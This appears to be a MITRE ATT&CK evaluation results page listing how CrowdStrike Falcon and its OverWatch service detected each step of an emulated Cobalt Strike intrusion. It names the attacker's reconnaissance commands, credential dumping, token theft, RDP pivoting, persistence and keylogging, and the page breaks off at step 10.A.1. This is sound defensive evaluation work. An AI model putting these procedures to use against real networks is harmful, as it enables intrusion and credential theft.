Home  >  Results  >  CrowdStrike  >  Overview
Prevent
Insight
Overwatch
Endpoint Protection Standard Bundle
Falcon
CrowdStrike
Tags:    

CrowdStrike Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Vendor Configuration     JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
General Behavior
  
A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious.
Telemetry
  
Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
Machine Learning General Behavior alert showing execution of Resume Viewer.exe and detection as malicious
Rundll32
(T1085)
Specific Behavior
  
A Specific Behavior alert was generated due to rundll32 launching a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion).
General Behavior (Delayed)
  
 
OverWatch generated a General Behavior alert indicating rundll32 executing update.dat was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert showing rundll32 execution (mapped to correct ATT&CK Technique, Rundll32, and Tactic, Defense Evasion. Green arrow indicates injection.)
OverWatch General Behavior alert indicating rundll32 execution was suspicious
Scripting
(T1064)
General Behavior (Delayed)
  
 
OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry showed pdfhelper.cmd being executed by cmd.exe.
OverWatch General Behavior alert indicating pdfhelper.cmd execution was suspicious
Telemetry showing pdfhelper.cmd execution
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data maybe indicative of modifications to the folder.
Telemetry showing Registry modification related to Startup Folder
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
None
  
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically).
OverWatch alert showing suspicious DNS traffic (does not count as a detection)
Data Encoding
(T1132)
Telemetry (Tainted)
  
 
Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert.
Telemetry within an alert showing encoded DNS requests (tainted by parent Exfiltration alert)
Standard Application Layer Protocol
(T1071)
Specific Behavior
  
A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration).
General Behavior (Delayed)
  
 
OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing abnormally large DNS requests mapped to related ATT&CK Technique, Exfiltration Over Alternative Protocol, and Tactic, Exfiltration) and OverWatch General Behavior alert indicating that traffic was suspicious
Telemetry showing DNS requests
Email excerpt from the OverWatch team indicating they observed suspected command and control or data exfiltration via DNS (Specific Behavior)
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing ipconfig with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (ipconfig not specifically shown)
Email excerpt from the OverWatch team indicating ipconfig was a reconnaissance command (General Behavior)
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing arp with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (arp not specifically shown)
Email excerpt from the OverWatch team indicating arp was a reconnaissance command (General Behavior)
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing echo with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (echo not specifically shown)
Email excerpt from the OverWatch team indicating echo was a reconnaissance command (General Behavior)
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing tasklist with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (tasklist not specifically shown)
Email excerpt from the OverWatch team indicating tasklist was a reconnaissance command (General Behavior)
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing sc with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (sc query not specifically shown)
Email excerpt from the OverWatch team indicating sc query was a reconnaissance command (General Behavior)
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net start not specifically shown)
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted.
General Behavior (Delayed)
  
 
OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing systeminfo
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (systeminfo not specifically shown)
OverWatch General Behavior alert indicating systeminfo.exe was suspicious
Email excerpt from the OverWatch team indicating systeminfo was a reconnaissance command (General Behavior)
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net config not specifically shown)
Email excerpt from the OverWatch team indicating net config was a reconnaissance command (General Behavior)
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
General Behavior (Delayed)
  
 
OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net localgroup not specifically shown)
OverWatch General Behavior alert for net localgroup
Email excerpt from the OverWatch team indicating net localgroup was a reconnaissance command (General Behavior)
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net localgroup not specifically shown)
Email excerpt from the OverWatch team indicating net localgroup was a reconnaissance command (General Behavior)
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment (Tainted)
  
 
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection.
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted by orange line for medium severity from previous detection)
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe (including net group) as tainted by orange line for medium severity
Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net user not specifically shown)
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (net user not specifically shown)
Email excerpt from the OverWatch team indicating net user was a reconnaissance command (General Behavior)
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing reg with command-line arguments
Process tree showing all cmd.exe children under rundll32.exe as tainted by orange line for medium severity (reg query not specifically shown)
Email excerpt from the OverWatch team indicating reg query was a reconnaissance command (General Behavior)
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
None
  
No detection capability demonstrated for this procedure.
Bypass User Account Control
(T1088)
Telemetry
  
Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC.
Telemetry showing process integrity level change for Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High)
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated showing that PowerShell created a thread into a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections.
Telemetry
  
Telemetry associated with the alert would show thread creation in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
General Behavior (Delayed, Tainted)
  
  
OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections. OverWatch is the managed threat hunting service.
Specific Behavior Process Injection alert mapped to correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion) as well as OverWatch General Behavior alert identifying behavior as suspicious
Telemetry showing process tree view of Process Injection Specific Behavior alert and OverWatch General Behavior alert tainted by parent detections (orange line indicates medium severity)
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
  
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery).
Telemetry
  
Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
General Behavior (Delayed)
  
 
OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery)
Additional process tree view showing net.exe enrichment
OverWatch General Behavior alert for net group
Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
  
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery).
Telemetry
  
Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team identified net group as suspicious with a General Behavior alert. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery)
Additional process tree view showing net.exe enrichment
OverWatch General Behavior alert for net group
Email excerpt from the OverWatch team indicating net group was a reconnaissance command (General Behavior)
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
  
 
OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert indicating netsh execution by cmd.exe was suspicious
Email excerpt from the OverWatch team indicating netsh was a reconnaissance command (General Behavior)
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
  
 
OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert indicating netstat execution by cmd.exe was suspicious
Email excerpt from the OverWatch team indicating netstat was a reconnaissance command (General Behavior)
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
Telemetry
  
Telemetry showing the lsass handle open and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
General Behavior (Delayed, Tainted)
  
  
A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection. OverWatch is the managed threat hunting service.
Specific Behavior alert for Credential Dumping and OverWatch General Behavior alert (tainted by previous detection by orange line indicating medium severity )
Process Injection
(T1055)
Enrichment
  
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an lsass process accessed (ProcessHollowingDetected).
Enrichment showing ReflectiveDllOpenLsass and ProcessHollowingDetected events
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
Specific Behavior (Tainted)
  
 
A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection.
Telemetry
  
Telemetry for the lsass remote thread and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance.
General Behavior (Delayed, Tainted)
  
  
OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection. OverWatch is the managed threat hunting service.
Two Specific Behavior alerts for Credential Dumping (mapped to correct ATT&CK Technique, Credential Dumping, and Tactic, Credential Access) and General Behavior OverWatch alert
Process tree view of Specific Behavior alerts for Credential Dumping and OverWatch General Behavior alert (tainted by previous detection by orange line indicating medium severity )
Process Injection
(T1055)
Enrichment
  
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode).
Enrichment showing ReflectiveDllOpenLsass, ProcessHollowingDetected, and LsassInjectedCode events
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry
  
Telemetry showed the compromised process (21898821890) running as Debbie, then children from this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process.
Telemetry showing children of the compromised process (PID 21898821890) first running as Debbie, then as George
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process. OverWatch is the managed threat hunting service.
Telemetry showing reg with command-line arguments
OverWatch General Behavior alert identifying reg query as suspicious as well as reg.exe process (tainted by previous detection by orange line indicating medium severity)
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server).
Telemetry showing TCP port 80 connection to 192.168.0.4 (C2 server)
Multiband Communication
(T1026)
Telemetry (Tainted)
  
 
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert.
Telemetry within an alert showing abnormally large DNS requests occurred (tainted by parent Exfiltration alert)
Telemetry showing TCP port 80 connection to 192.168.0.4 (C2 server)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically).
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing logon type 10 (interactive remote login) as user George@shockwave on 10.0.0.5 (Conficker)
Telemetry showing a network connection to 10.0.0.5 (Conficker) over TCP port 3389
Email excerpt from the OverWatch team indicating suspicious communications over 3389 (RDP) were observed (General Behavior)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
  
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group.
Telemetry showing creation of the user Jesse with the user RID 000003E8
Telemetry showing user RID 000003E8 (corresponding to the user Jesse) added to the admin group (00000220), a well-known security identifier
Telemetry showing group membership of the user Jesse, including Remote (0000022B), Admins (00000220), and Users (00000221), which are well-known security identifiers
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe running lursmgr.msc
Account Discovery
(T1087)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Telemetry showing mmc.exe running lursmgr.msc
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent "unexpected process" alert.
Telemetry showing file write for updater.dll (tainted by the parent "unexpected process" alert)
Additional telemetry showing file write for updater.dll
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed the creation of the scheduled task.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing creation of the scheduled task
General Behavior alert from OverWatch indicating scheduled task creation was suspicious (tainted by previous cmd.exe detection by orange line indicating medium severity)
Email excerpt from OverWatch team indicating they observed a scheduled task establishing persistence (Specific Behavior)
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection.
Telemetry showing cmd.exe running dir with command-line arguments (search was on commands running within the past 10 minutes)
Process tree view showing cmd.exe that ran dir (dir not specifically shown, cmd.exe is second from top and tainted by previous detection by orange line indicating medium severity)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing cmd.exe running tree with command-line arguments (search was on commands running within the past 10 minutes)
OverWatch General Behavior alert indicating tree.com was suspicious (tainted by previous detection by orange line indicating medium severity)
Additional details for OverWatch General Behavior alert indicating tree.com was suspicious (tainted by previous detection by orange line indicating medium severity)
Email excerpt from the OverWatch team indicating tree was a reconnaissance command (General Behavior)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
  
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically).
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890) (does not count as a detection)
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
  
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically).
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890) (does not count as a detection)
Process Injection
(T1055)
Telemetry
  
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon.
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890)
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure.
10.A.1
